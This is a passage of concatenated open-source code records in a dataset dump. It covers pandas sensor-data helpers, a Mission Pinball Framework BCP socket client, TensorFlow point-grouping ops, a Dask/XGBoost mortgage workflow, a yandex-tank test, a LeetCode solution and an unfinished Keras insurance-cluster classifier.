'Sensordata',\n 'xanchor': 'center',\n 'xref': 'paper',\n 'y': 0.98\n},\n\"\"\"\n\ndef resolve_dates(*args):\n \"\"\"\n If arguments are date strings, convert to dates, otherwise return None\n \"\"\"\n return tuple(\n dt.strptime(re.split('T| ', date)[0], '%Y-%m-%d')\n if date is not None else date\n for date in args\n )\n\ndef filter_by_hours(df, hour_ints):\n \"\"\"Filter date indexed df by the hours (ints) in hour_ints\"\"\"\n from datetime import time\n first, last = tuple(map(time, hour_ints))\n if first.hour != 0:\n df = df = df[first <= df.index.map(lambda d: d.time())]\n if last.hour != 23:\n df = df[df.index.map(lambda d: d.time()) <= last]\n return df # Could also use df.between_time(start_time, end_time), faster?\n\ndef aggregate_hours(df: pd.DataFrame, method: str = 'mean'):\n \"\"\"Aggregate specified hours by method (mean, max, min or median)\"\"\"\n df = df.groupby(df.index.date).agg({ col: [method] for col in df.columns })\n df.index = pd.to_datetime(df.index)\n df.columns = df.columns.droplevel(1)\n return df\n\ndef aggregate_days(df: pd.DataFrame, method: str = 'mean'):\n \"\"\"Aggregate days of the month by method, e.g. mean\"\"\"\n df = df.groupby([pd.Grouper(freq='MS'), df.index.hour]).agg(\n { col: [method] for col in df.columns}\n )\n df.index = df.index.map( lambda m: m[0].replace(hour=m[1]))\n df.columns = df.columns.droplevel(1)\n return df\n\ndef aggregate_months(df: pd.DataFrame, method: str = 'mean'):\n \"\"\"Aggregate months of the year by methof, e.g. sum\"\"\"\n df = df.groupby([pd.Grouper(freq='Y'), df.index.day, df.index.hour]).agg(\n { col: [method] for col in df.columns}\n )\n df.index = df.index.map( lambda m: m[0].replace(day= m[1], hour=m[2]) )\n df.columns = df.columns.droplevel(1)\n return df\n\n\ndef aggregate_years(df: pd.DataFrame, method: str = 'mean'):\n from datetime import datetime as dt\n \"\"\"Aggregate years by method, e.g. max\"\"\"\n df = df.groupby([df.index.month, df.index.day, df.index.hour]).agg(\n { col: [method] for col in df.columns}\n )\n df.index = df.index.map( lambda m: dt(2016, m[0], m[1], m[2])) # 2016, beacause this is a leap year\n df.columns = df.columns.droplevel(1)\n return df\n\ndef filter_wet_days(datapoints, window: list, treshold: float):\n \"\"\"\n Removes datapoints that is considered to be from \"rainy\" days.\n What is determined as a rainy day, depends on num_days and value.\n \n Args\n dict_of_dfs: result from reader.get_data, i.e. dfs containing data from all\n stations\n num_days: # of preceding days to concider when summing precipitation\n values including current day\n treshold: max treshold value for the summed precipitation level\n \"\"\"\n num_hours = 100 - window[0]\n current_values = [0] * num_hours # to store precipitation vals\n lag = 100 - window[1]\n \n def check_and_update(value):\n # FIFO - keeps length the same\n current_values.pop(0)\n current_values.append(value)\n # In case lag is 0 -> must use len\n return sum(current_values[:len(current_values) - lag]) < treshold\n \n for dp in datapoints:\n if 'florida_sentrum' in dp:\n val = dp['florida_sentrum']['precipitation (mm)']\n elif 'florida_uib' in dp:\n val = dp['florida_uib']['precipitation (mm)']\n else:\n val = 0 # whats the deffault?\n #print(f'no precipitation data for datapoint from {dp[\"date\"]}')\n if check_and_update(val):\n yield dp","repo_name":"scottgullaksen/bergenvann-summer-project","sub_path":"project/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42115506459","text":"\"\"\"BCP socket client.\"\"\"\nimport json\nfrom urllib.parse import urlsplit, parse_qs, quote, unquote, urlunparse\n\nimport asyncio\n\nfrom typing import Tuple\n\nfrom mpf._version import __version__, __bcp_version__\nfrom mpf.core.bcp.bcp_client import BaseBcpClient\n\nBYTE_MARKER = b'&bytes='\n\n\nclass MpfJSONEncoder(json.JSONEncoder):\n\n \"\"\"Encoder which by default encodes to string.\"\"\"\n\n # pylint: disable-msg=method-hidden\n def default(self, o):\n \"\"\"Encode to string.\"\"\"\n return str(o)\n\n\ndef decode_command_string(bcp_string) -> Tuple[str, dict]:\n \"\"\"Decode a BCP command string into separate command and parameter parts.\n\n Args:\n ----\n bcp_string: The incoming UTF-8, URL encoded BCP command string.\n\n Returns a tuple of the command string and a dictionary of kwarg pairs.\n\n Example:\n -------\n Input: trigger?name=hello&foo=Foo%20Bar\n Output: ('trigger', {'name': 'hello', 'foo': 'Foo Bar'})\n\n Note that BCP commands and parameter names are not case-sensitive and will\n be converted to lowercase. Parameter values are case sensitive, and case\n will be preserved.\n\n \"\"\"\n bcp_command = urlsplit(bcp_string, allow_fragments=False)\n\n if bcp_command.query[0:5] == \"json=\":\n kwargs = json.loads(bcp_command.query[5:])\n return bcp_command.path, kwargs\n\n try:\n kwargs = parse_qs(bcp_command.query, keep_blank_values=True)\n except AttributeError:\n kwargs = dict()\n\n for k, v in kwargs.items():\n if isinstance(v[0], str):\n if v[0].startswith('int:'):\n v[0] = int(v[0][4:])\n elif v[0].startswith('float:'):\n v[0] = float(v[0][6:])\n elif v[0].lower() == 'bool:true':\n v[0] = True\n elif v[0].lower() == 'bool:false':\n v[0] = False\n elif v[0] == 'NoneType:':\n v[0] = None\n else:\n v[0] = unquote(v[0])\n\n kwargs[k] = v\n\n return (bcp_command.path,\n dict((k, v[0]) for k, v in kwargs.items()))\n\n\ndef encode_command_string(bcp_command, **kwargs) -> str:\n \"\"\"Encode a BCP command and kwargs into a valid BCP command string.\n\n Args:\n ----\n bcp_command: String of the BCP command name.\n **kwargs: Optional pair(s) of kwargs which will be appended to the\n command.\n\n Returns a string.\n\n Example:\n -------\n Input: encode_command_string('trigger', {'name': 'hello', 'foo': 'Bar'})\n Output: trigger?name=hello&foo=Bar\n\n Note that BCP commands and parameter names are not case-sensitive and will\n be converted to lowercase. Parameter values are case sensitive, and case\n will be preserved.\n\n \"\"\"\n kwarg_string = ''\n json_needed = False\n\n for k, v in kwargs.items():\n if isinstance(v, (dict, list)):\n json_needed = True\n break\n\n value = quote(str(v), '')\n\n if isinstance(v, bool): # bool isinstance of int, so this goes first\n value = 'bool:{}'.format(value)\n elif isinstance(v, int):\n value = 'int:{}'.format(value)\n elif isinstance(v, float):\n value = 'float:{}'.format(value)\n elif v is None:\n value = 'NoneType:'\n else: # cast anything else as a string\n value = str(value)\n\n kwarg_string += '{}={}&'.format(quote(k, ''),\n value)\n\n kwarg_string = kwarg_string[:-1]\n\n if json_needed:\n kwarg_string = 'json={}'.format(json.dumps(kwargs, cls=MpfJSONEncoder))\n\n return str(urlunparse(('', '', bcp_command, '', kwarg_string, '')))\n\n\nclass AsyncioBcpClientSocket():\n\n \"\"\"Simple asyncio bcp client.\"\"\"\n\n def __init__(self, sender, receiver):\n \"\"\"initialize BCP client socket.\"\"\"\n self._sender = sender\n self._receiver = receiver\n self._receive_buffer = b''\n\n # pylint: disable-msg=inconsistent-return-statements\n async def read_message(self):\n \"\"\"Read the next message.\"\"\"\n while True:\n message = await self._receiver.readline()\n\n # handle EOF\n if not message:\n raise BrokenPipeError()\n\n # strip newline\n message = message[0:-1]\n\n if BYTE_MARKER in message:\n message, bytes_needed = message.split(BYTE_MARKER)\n bytes_needed = int(bytes_needed)\n\n raw_bytes = await self._receiver.readexactly(bytes_needed)\n\n message_obj = self._process_command(message, raw_bytes)\n\n else: # no bytes in the message\n message_obj = self._process_command(message)\n\n if message_obj:\n return message_obj\n\n def send(self, bcp_command, kwargs):\n \"\"\"Send a message to the BCP host.\n\n Args:\n ----\n bcp_command: command to send\n kwargs: parameters to command\n \"\"\"\n bcp_string = encode_command_string(bcp_command, **kwargs)\n self._sender.write((bcp_string + '\\n').encode())\n\n async def wait_for_response(self, bcp_command):\n \"\"\"Wait for a command and ignore all others.\"\"\"\n while True:\n cmd, args = await self.read_message()\n if cmd == \"reset\":\n self.send(\"reset_complete\", {})\n continue\n if cmd == bcp_command:\n return cmd, args\n\n @staticmethod\n def _process_command(message, rawbytes=None):\n cmd, kwargs = decode_command_string(message.decode())\n if rawbytes:\n kwargs['rawbytes'] = rawbytes\n\n return cmd, kwargs\n\n\nclass BCPClientSocket(BaseBcpClient):\n\n \"\"\"MPF version of the AsyncioBcpClientSocket.\n\n (There can be multiple of these to connect to multiple BCP media controllers simultaneously.)\n\n Args:\n ----\n machine: The main MachineController object.\n name: String name this client.\n bcp: The bcp object.\n \"\"\"\n\n config_name = 'bcp_client'\n\n __slots__ = [\"_sender\", \"_receiver\", \"_send_goodbye\", \"_receive_buffer\", \"_bcp_client_socket_commands\", \"__dict__\"]\n\n def __init__(self, machine, name, bcp):\n \"\"\"initialize BCP client socket.\"\"\"\n super().__init__(machine, name, bcp)\n\n self._sender = None\n self._receiver = None\n self._send_goodbye = True\n self._receive_buffer = b''\n\n self._bcp_client_socket_commands = {'hello': self._receive_hello,\n 'goodbye': self._receive_goodbye}\n\n def __repr__(self):\n \"\"\"Return str representation.\"\"\"\n return 'BCPClientSocket.{}'.format(self.name)\n\n async def connect(self, config):\n \"\"\"Actively connect to server.\"\"\"\n return await self._setup_client_socket(config['host'], config['port'], config.get('required'))\n\n async def _setup_client_socket(self, client_host, client_port, required=True):\n \"\"\"Set up the client socket.\"\"\"\n self.info_log(\"Connecting BCP to '%s' at %s:%s...\",\n self.name, client_host, client_port)\n\n while True:\n connector = self.machine.clock.open_connection(client_host, client_port)\n try:\n self._receiver, self._sender = await connector\n except OSError:\n if required:\n await asyncio.sleep(.1)\n continue\n\n self.info_log(\"No BCP connection made to '%s' %s:%s\",\n self.name, client_host, client_port)\n return False\n\n break\n\n self.info_log(\"Connected BCP to '%s' %s:%s\", self.name, client_host, client_port)\n\n self.send_hello()\n return True\n\n def accept_connection(self, receiver, sender):\n \"\"\"Create client for incoming connection.\"\"\"\n self._receiver = receiver\n self._sender = sender\n\n self.send_hello()\n\n def stop(self):\n \"\"\"Stop and shut down the socket client.\"\"\"\n self.debug_log(\"Stopping socket client\")\n\n if self._send_goodbye:\n self.send_goodbye()\n\n self._sender.close()\n\n def send(self, bcp_command, kwargs):\n \"\"\"Send a message to the BCP host.\n\n Args:\n ----\n bcp_command: command to send\n kwargs: parameters to command\n \"\"\"\n try:\n bcp_string = encode_command_string(bcp_command, **kwargs)\n # pylint: disable-msg=broad-except\n except Exception as e:\n self.warning_log(\"Failed to encode bcp_command %s with args %s. %s\", bcp_command, kwargs, e)\n return\n\n if self._debug:\n self.debug_log('Sending \"%s\"', bcp_string)\n\n if hasattr(self._sender.transport, \"is_closing\") and self._sender.transport.is_closing():\n self.warning_log(\"Failed to write to bcp since transport is closing. Transport %s\", self._sender.transport)\n return\n self._sender.write((bcp_string + '\\n').encode())\n\n # pylint: disable-msg=inconsistent-return-statements\n async def read_message(self):\n \"\"\"Read the next message.\"\"\"\n while True:\n message = await self._receiver.readline()\n\n # handle EOF\n if not message:\n raise BrokenPipeError()\n\n # strip newline\n message = message[0:-1]\n\n if BYTE_MARKER in message:\n message, bytes_needed = message.split(b'&bytes=')\n bytes_needed = int(bytes_needed)\n\n rawbytes = await self._receiver.readexactly(bytes_needed)\n\n message_obj = self._process_command(message, rawbytes)\n\n else: # no bytes in the message\n message_obj = self._process_command(message)\n\n if message_obj:\n return message_obj\n\n def _process_command(self, message, rawbytes=None):\n if self._debug:\n self.debug_log('Received \"%s\"', message)\n\n cmd, kwargs = decode_command_string(message.decode())\n if rawbytes:\n kwargs['rawbytes'] = rawbytes\n\n if cmd in self._bcp_client_socket_commands:\n self._bcp_client_socket_commands[cmd](**kwargs)\n return None\n\n return cmd, kwargs\n\n def _receive_hello(self, **kwargs):\n \"\"\"Process incoming BCP 'hello' command.\"\"\"\n self.debug_log('Received BCP Hello from host with kwargs: %s', kwargs)\n\n def _receive_goodbye(self):\n \"\"\"Process incoming BCP 'goodbye' command.\"\"\"\n self._send_goodbye = False\n self.stop()\n\n def send_hello(self):\n \"\"\"Send BCP 'hello' command.\"\"\"\n self.send('hello', {\"version\": __bcp_version__,\n \"controller_name\": 'Mission Pinball Framework',\n \"controller_version\": __version__})\n\n def send_goodbye(self):\n \"\"\"Send BCP 'goodbye' command.\"\"\"\n self.send('goodbye', {})\n","repo_name":"missionpinball/mpf","sub_path":"mpf/core/bcp/bcp_socket_client.py","file_name":"bcp_socket_client.py","file_ext":"py","file_size_in_byte":10959,"program_lang":"python","lang":"en","doc_type":"code","stars":192,"dataset":"github-code","pt":"19"} +{"seq_id":"31751805332","text":"import os\nimport sys\n\nimport tensorflow as tf\nfrom tensorflow.python.framework import ops\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(BASE_DIR)\ngrouping_module = tf.load_op_library(os.path.join(BASE_DIR, \"tf_grouping_so.so\"))\n\n\ndef query_ball_point(\n radius: float, k: int, xyz1: tf.Tensor, xyz2: tf.Tensor\n) -> (tf.Tensor, tf.Tensor):\n \"\"\"Return k points within a ball region of radius around the query points.\n\n Arguments:\n radius : float\n The ball region search radius.\n k : int\n The number of points selected in each ball region.\n xyz1 : tf.Tensor(shape=(batch_size, P1, 3), dtype=tf.float32)\n The input points with P1 number of points given in xyz.\n xyz2 : tf.Tensor(shape=(batch_size, P2, 3), dtype=tf.float32)\n The query points with P2 number of points given in xyz.\n\n Returns:\n indices : tf.Tensor(shape=(batch_size, P2, k), dtype=tf.int32)\n The indices of the k ball region points in the input points.\n unique_point_count : tf.Tensor(shape=(batch_size, k), dtype=tf.int32)\n The number of unique points in each local region.\n \"\"\"\n return grouping_module.query_ball_point(xyz1, xyz2, radius, k)\n\n\nops.NoGradient(\"QueryBallPoint\")\n\n\ndef select_top_k(k: int, data: tf.Tensor) -> (tf.Tensor, tf.Tensor):\n \"\"\"Returns the indices and elements of the k smallest elements of data.\n\n Arguments:\n k : int\n The number of the k SMALLEST elements selected.\n data : tf.Tensor(shape=(batch_size, m, n), dtype=tf.float32)\n A distance matrix with m query points and n dataset points.\n\n Returns:\n indices : tf.Tensor(shape=(batch_size, m, n), dtype=tf.int32)\n The first k in n are the indices to the top k.\n distances : tf.Tensor(shape=(batch_size, m, n), dtype=tf.float32)\n The first k in n are the distances of the top k.\n \"\"\"\n\n return grouping_module.selection_sort(data, k)\n\n\nops.NoGradient(\"SelectionSort\")\n\n\ndef group_point(data: tf.Tensor, indices: tf.Tensor) -> tf.Tensor:\n \"\"\"Group points according to indices.\n\n Arguments:\n data : tf.Tensor(shape=(batch_size, P1, channels), dtype=tf.float32)\n The data to sample from with P1 number of points.\n indices : tf.Tensor(shape=(batch_size, P2, k), dtype=tf.int32)\n The indices to the points with P2 query positions and k entries.\n\n Returns:\n group : tf.Tensor(shape=(batch_size, P2, k, channels), dtype=tf.float32)\n The values sampled from points with indices.\n\n \"\"\"\n\n return grouping_module.group_point(data, indices)\n\n\n@tf.RegisterGradient(\"GroupPoint\")\ndef _group_point_grad(op, grad_out):\n points = op.inputs[0]\n idx = op.inputs[1]\n return [grouping_module.group_point_grad(points, idx, grad_out), None]\n\n\ndef knn_point(k: int, xyz1: tf.Tensor, xyz2: tf.Tensor) -> (tf.Tensor, tf.Tensor):\n \"\"\"Compute the distances and indices of the k nearest neighbors.\n\n Arguments:\n k : int\n The number of neighbors to return in KNN search.\n xyz1 : tf.Tensor(shape=(batch_size, P1, channels), dtype=tf.float32)\n The input points with P1 number of points and channels given in xyz.\n xyz2 : tf.Tensor(shape=(batch_size, P2, channels), dtype=tf.float32)\n The query points with P2 number of points and channels given in xyz.\n\n Returns:\n indices : tf.Tensor(shape=(batch_size, P2, k), dtype=tf.int32)\n The indices of of the k nearest neighbors in the input points.\n distances : tf.Tensor(shape=(batch_size, P2, k), dtype=tf.float32)\n The L2 distances of the k nearest neighbors.\n \"\"\"\n # Internal broadcast to (batch_size, num_points_2, num_points_1, channels).\n xyz1 = xyz1[:, tf.newaxis, :, :]\n xyz2 = xyz2[:, :, tf.newaxis, :]\n\n # Compute the L2 distances.\n distances = tf.reduce_sum((xyz1 - xyz2) ** 2, axis=-1)\n\n # Use select_to_k with GPU support (tf.nn.top_k only has CPU support).\n indices, distances = select_top_k(k, distances)\n indices = indices[..., :k]\n distances = distances[..., :k]\n\n return indices, distances\n","repo_name":"ltriess/pointnet2_keras","sub_path":"pointnet2/tf_ops/grouping/tf_grouping.py","file_name":"tf_grouping.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"75060149484","text":"'''\n'''\nimport os\n\ntry:\n # Disable NCCL P2P. Only necessary for versions of NCCL < 2.4\n # https://rapidsai.github.io/projects/cudf/en/0.8.0/dask-xgb-10min.html#Disable-NCCL-P2P.-Only-necessary-for-versions-of-NCCL-%3C-2.4\n os.environ[\"NCCL_P2P_DISABLE\"] = \"1\"\nexcept Exception:\n pass\n\nimport json\n\nfrom dask_cuda import LocalCUDACluster\nfrom dask.distributed import Client\n# from distributed import Client\n\nfrom mortgage_common import (\n mortgage_etl_workflow_def, generate_mortgage_greenflow_run_params_list,\n MortgageTaskNames)\n\n\ndef main():\n\n memory_limit = 128e9\n threads_per_worker = 4\n cluster = LocalCUDACluster(\n memory_limit=memory_limit,\n threads_per_worker=threads_per_worker)\n client = Client(cluster)\n sched_info = client.scheduler_info()\n\n print('CLIENT: {}'.format(client))\n print('SCHEDULER INFO:\\n{}'.format(json.dumps(sched_info, indent=2)))\n\n # Importing here in case RMM is used later on. Must start client prior\n # to importing cudf stuff if using RMM.\n from greenflow.dataframe_flow import (TaskSpecSchema, TaskGraph)\n\n # workers_names = \\\n # [iw['name'] for iw in client.scheduler_info()['workers'].values()]\n # nworkers = len(workers_names)\n\n _basedir = os.path.dirname(__file__)\n # mortgage_data_path = '/datasets/rapids_data/mortgage'\n mortgage_data_path = os.path.join(_basedir, 'mortgage_data')\n\n # Using some default csv files for testing.\n # csvfile_names = os.path.join(mortgage_data_path, 'names.csv')\n # acq_data_path = os.path.join(mortgage_data_path, 'acq')\n # perf_data_path = os.path.join(mortgage_data_path, 'perf')\n # csvfile_acqdata = os.path.join(acq_data_path, 'Acquisition_2000Q1.txt')\n # csvfile_perfdata = \\\n # os.path.join(perf_data_path, 'Performance_2000Q1.txt_0')\n # mortgage_etl_workflow_def(\n # csvfile_names, csvfile_acqdata, csvfile_perfdata)\n\n greenflow_task_spec_list = mortgage_etl_workflow_def()\n\n start_year = 2000\n end_year = 2001 # end_year is inclusive\n # end_year = 2016 # end_year is inclusive\n # part_count = 16 # the number of data files to train against\n\n # create_dmatrix_serially - When False on same node if not enough host RAM\n # then it's a race condition when creating the dmatrix. Make sure enough\n # host RAM otherwise set to True.\n # create_dmatrix_serially = False\n\n # able to do 18 with create_dmatrix_serially set to True\n part_count = 18 # the number of data files to train against\n create_dmatrix_serially = True\n # part_count = 4 # the number of data files to train against\n\n # Use RAPIDS Memory Manager. Seems to work fine without it.\n use_rmm = False\n\n # Clean up intermediate dataframes in the xgboost training task.\n delete_dataframes = True\n\n mortgage_run_params_dict_list = generate_mortgage_greenflow_run_params_list(\n mortgage_data_path, start_year, end_year, part_count,\n greenflow_task_spec_list)\n\n _basedir = os.path.dirname(__file__)\n mortgage_lib_module = os.path.join(_basedir, 'mortgage_greenflow_plugins.py')\n\n filter_dask_logger = False\n\n mortgage_workflow_runner_task = {\n TaskSpecSchema.task_id:\n MortgageTaskNames.dask_mortgage_workflow_runner_task_name,\n TaskSpecSchema.node_type: 'DaskMortgageWorkflowRunner',\n TaskSpecSchema.conf: {\n 'mortgage_run_params_dict_list': mortgage_run_params_dict_list,\n 'client': client,\n 'use_rmm': use_rmm,\n 'filter_dask_logger': filter_dask_logger,\n },\n TaskSpecSchema.inputs: [],\n TaskSpecSchema.filepath: mortgage_lib_module\n }\n\n dxgb_gpu_params = {\n 'nround': 100,\n 'max_depth': 8,\n 'max_leaves': 2 ** 8,\n 'alpha': 0.9,\n 'eta': 0.1,\n 'gamma': 0.1,\n 'learning_rate': 0.1,\n 'subsample': 1,\n 'reg_lambda': 1,\n 'scale_pos_weight': 2,\n 'min_child_weight': 30,\n 'tree_method': 'gpu_hist',\n 'n_gpus': 1,\n 'distributed_dask': True,\n 'loss': 'ls',\n # 'objective': 'gpu:reg:linear',\n 'objective': 'reg:squarederror',\n 'max_features': 'auto',\n 'criterion': 'friedman_mse',\n 'grow_policy': 'lossguide',\n 'verbose': True\n }\n\n dxgb_trainer_task = {\n TaskSpecSchema.task_id: MortgageTaskNames.dask_xgb_trainer_task_name,\n TaskSpecSchema.node_type: 'DaskXgbMortgageTrainer',\n TaskSpecSchema.conf: {\n 'create_dmatrix_serially': create_dmatrix_serially,\n 'delete_dataframes': delete_dataframes,\n 'dxgb_gpu_params': dxgb_gpu_params,\n 'client': client,\n 'filter_dask_logger': filter_dask_logger\n },\n TaskSpecSchema.inputs: [\n MortgageTaskNames.dask_mortgage_workflow_runner_task_name\n ],\n TaskSpecSchema.filepath: mortgage_lib_module\n }\n\n task_spec_list = [mortgage_workflow_runner_task, dxgb_trainer_task]\n\n out_list = [MortgageTaskNames.dask_xgb_trainer_task_name]\n task_graph = TaskGraph(task_spec_list)\n (bst,) = task_graph.run(out_list)\n\n print('XGBOOST BOOSTER:\\n', bst)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"NVIDIA/fsi-samples","sub_path":"gQuant/plugins/gquant_plugin/notebooks/mortgage_e2e_gquant/mortgage_run_workflow_daskdistrib.py","file_name":"mortgage_run_workflow_daskdistrib.py","file_ext":"py","file_size_in_byte":5229,"program_lang":"python","lang":"en","doc_type":"code","stars":263,"dataset":"github-code","pt":"19"} +{"seq_id":"42108469419","text":"import pytest\n\nfrom yandextank.common.interfaces import TankInfo\n\n\nclass TestStatus(object):\n\n @pytest.mark.parametrize('updates, result', [\n ([(['plugin', 'key1'], 'foo'), (['plugin', 'key2'], 42)], {'plugin': {'key1': 'foo', 'key2': 42}}),\n ([(['plugin1', 'key1'], 'foo'),\n (['plugin1', 'key2'], 42),\n (['plugin2', 'key1'], 'bar')], {'plugin1': {'key1': 'foo', 'key2': 42},\n 'plugin2': {'key1': 'bar'}})\n ])\n def test_update(self, updates, result):\n info = TankInfo(dict())\n for args in updates:\n info.update(*args)\n assert info.get_info_dict() == result\n","repo_name":"yandex/yandex-tank","sub_path":"yandextank/common/tests/test_interfaces.py","file_name":"test_interfaces.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":2344,"dataset":"github-code","pt":"19"} +{"seq_id":"4282144107","text":"\"\"\"\n 5372 逐步求和得到正数的最小值\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def minStartValue(self, nums: List[int]) -> int:\n min_r = 0\n r = 0\n for n in nums:\n r += n\n if r < min_r:\n min_r = r\n\n if min_r > 0:\n return 1\n else:\n return -min_r + 1\n\n\nif __name__ == '__main__':\n s = Solution()\n\n num = [1, 2]\n print(s.minStartValue(num))\n","repo_name":"MerleLiuKun/GoGoGo","sub_path":"ikaros/week-24-double/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"35536382641","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport keras \nimport numpy as np\nfrom keras.preprocessing.text import Tokenizer\nimport numpy as np\nimport pandas as pd\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers import Input, Dense, Dropout, Embedding, LSTM, Flatten\nfrom keras.models import Model\nfrom keras.utils import to_categorical\nfrom keras.callbacks import ModelCheckpoint\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\n\n# In[2]:\n\nfrom keras.layers import Dropout,Concatenate,merge,BatchNormalization\n\n\n# In[3]:\n\nfrom keras.optimizers import SGD\n\n\n# In[4]:\n\nfrom keras.layers.merge import concatenate\nfrom keras.metrics import categorical_accuracy\n\n\n# In[5]:\n\ndata=pd.read_csv(\"/Users/Mainaki Saraf/Desktop/clustering/clusters.csv\",encoding=\"ISO-8859-1\",low_memory=False)\n\n\n# In[6]:\n\ndata['target'] = data.CLUSTER.astype('category').cat.codes\n\n\n# In[7]:\n\nnum_class = len(np.unique(data.CLUSTER.values))\ny = data['target'].values\n\n\n# In[8]:\n\nMAX_LENGTH = 100\ntokenizer = Tokenizer(split='\\n')\ntokenizer.fit_on_texts(data.STATE.values)\npost_seq = tokenizer.texts_to_sequences(data.STATE.values)\ndata[\"STATE\"]=pad_sequences(post_seq, maxlen=MAX_LENGTH)\n\n\n# In[9]:\n\nMAX_LENGTH = 100\ntokenizer2 = Tokenizer(split='\\n')\ntokenizer2.fit_on_texts(data.COVERAGE.values)\npost_seq2 = tokenizer2.texts_to_sequences(data.COVERAGE.values)\ndata[\"COVERAGE\"]=pad_sequences(post_seq2, maxlen=MAX_LENGTH)\n\n\n# In[10]:\n\nMAX_LENGTH = 100\ntokenizer3 = Tokenizer(split='\\n')\ntokenizer3.fit_on_texts(data.IPOLNO.values)\npost_seq3 = tokenizer3.texts_to_sequences(data.IPOLNO.values)\ndata[\"IPOLNO\"]=pad_sequences(post_seq3, maxlen=MAX_LENGTH)\n\n\n# In[11]:\n\nMAX_LENGTH = 100\ntokenizer4 = Tokenizer(split='\\n')\ntokenizer4.fit_on_texts(data.OCCURRENCE.values)\npost_seq4 = tokenizer4.texts_to_sequences(data.OCCURRENCE.values)\ndata[\"OCCURRENCE\"] = pad_sequences(post_seq4, maxlen=MAX_LENGTH)\n\n\n# In[12]:\n\nx_data=np.array(data.drop([\"CLUSTER\",\"target\",\"DRIVERAGE\",\"YORKPAID\",\"VEHAGE\"],axis=1))\n#x_num=np.array(data[\"DRIVERAGE\"])\nx_num=np.array(data.drop([\"STATE\",\"COVERAGE\",\"CLUSTER\",\"target\",\"OCCURRENCE\",\"IPOLNO\"],axis=1))\n\n\n# In[13]:\n\nx_data=np.array_split(x_data,15)\nx_num=np.array_split(x_num,15)\ny=np.array_split(y,15)\n\n\n# In[14]:\n\nlen(y[0])\n\n\n# In[15]:\n\n#input 1- categorical features as input\nvisible1 = Input(shape=(4,))\nembedding_layer = Embedding(4,128,input_length=4)(visible1)\nv1 = Flatten()(embedding_layer)\n\n\n# In[16]:\n\n#input 2 - numerical features as input\n#visible2 = Input(shape=(1,))\n#visible2 = Input(shape=(2,))\nvisible2 = Input(shape=(3,))\n\n\n# In[17]:\n\nmerge = concatenate([v1, visible2])\n\n\n# In[18]:\n\nx= Dense(7,activation='relu')(merge)\nx=BatchNormalization()(x)\nx= Dense(25,activation='relu')(x)\nx= Dense(20,activation='relu')(x)\nx=Dropout(0.05)(x)\nx= Dense(15,activation='relu')(x)\nx = Dense(10, activation='relu')(x)\nx = Dense(5, activation='relu')(x)\n\npredictions = Dense(num_class, activation='softmax')(x)\n\n\n# In[19]:\n\nmodel = Model(inputs=[visible1,visible2], outputs=predictions)\n\n\n# In[20]:\n\nmodel.compile(optimizer='adam',loss='categorical_crossentropy',metrics=['acc'])\n#model.compile(optimizer='adam',loss='binary_crossentropy',metrics=[categorical_accuracy])\n#model.compile(optimizer='adam',loss='binary_crossentropy',metrics=['mse'])\n\n\n# In[21]:\n\nmodel.summary()\n\n\n# In[29]:\n\nfilepath=\"weights-simple56.hdf5\"\ncheckpointer = ModelCheckpoint(filepath, monitor='val_acc', verbose=1, save_best_only=True, mode='max')\n\n\n# In[30]:\n\nfor i in range(5,10):\n X_train, X_test, y_train, y_test = train_test_split(x_data[i], y[i], test_size=0.05,random_state=42)\n X_train1, X_test1, y_train1, y_test1= train_test_split(x_num[i], y[i], test_size=0.05,random_state=42)\n history = model.fit([X_train,X_train1], batch_size=64, y=to_categorical(y_train), verbose=1, validation_split=0.15, shuffle=True, epochs=70, callbacks=[checkpointer])\n\n\n# In[371]:\n\n#filepath=\"weights-simple16.hdf5\"\n\n\n# In[372]:\n\n#checkpointer = ModelCheckpoint(filepath, monitor='val_acc', verbose=1, save_best_only=True, mode='max')\n\n\n# In[373]:\n\n#X_train, X_test, y_train, y_test = train_test_split(x_data, y, test_size=0.05)\n#X_train1, X_test1, y_train1, y_test1= train_test_split(x_num, y, test_size=0.05)\n\n\n# In[374]:\n\n#history = model.fit([X_train,X_train1], batch_size=64, y=to_categorical(y_train), verbose=1, validation_split=0.15, shuffle=True, epochs=70, callbacks=[checkpointer])\n\n\n# In[31]:\n\ndf = pd.DataFrame({'epochs':history.epoch, 'accuracy': history.history['acc'], 'validation_accuracy': history.history['val_acc']})\ng = sns.pointplot(x=\"epochs\", y=\"accuracy\", data=df, fit_reg=False)\ng = sns.pointplot(x=\"epochs\", y=\"validation_accuracy\", data=df, fit_reg=False, color='green')\n\n\n# In[32]:\n\nplt.show()\n\n\n# In[33]:\n\nfrom tkinter import *\n\n\n# In[34]:\n\ndef pred(string):\n test=pd.read_csv(string,encoding=\"ISO-8859-1\",low_memory=False)\n \n MAX_LENGTH = 100\n state=list(test.STATE)\n tokenizer = Tokenizer(split='\\n')\n tokenizer.fit_on_texts(test.STATE.values)\n post_seq = tokenizer.texts_to_sequences(test.STATE.values)\n test[\"STATE\"]=pad_sequences(post_seq, maxlen=MAX_LENGTH)\n \n MAX_LENGTH = 100\n cov=list(test.COVERAGE)\n tokenizer2 = Tokenizer(split='\\n')\n tokenizer2.fit_on_texts(test.COVERAGE.values)\n post_seq2 = tokenizer2.texts_to_sequences(test.COVERAGE.values)\n test[\"COVERAGE\"]=pad_sequences(post_seq2, maxlen=MAX_LENGTH)\n \n MAX_LENGTH = 100\n ipolno=list(test.IPOLNO)\n tokenizer3 = Tokenizer(split='\\n')\n tokenizer3.fit_on_texts(test.IPOLNO.values)\n post_seq3 = tokenizer3.texts_to_sequences(test.IPOLNO.values)\n test[\"IPOLNO\"]=pad_sequences(post_seq3, 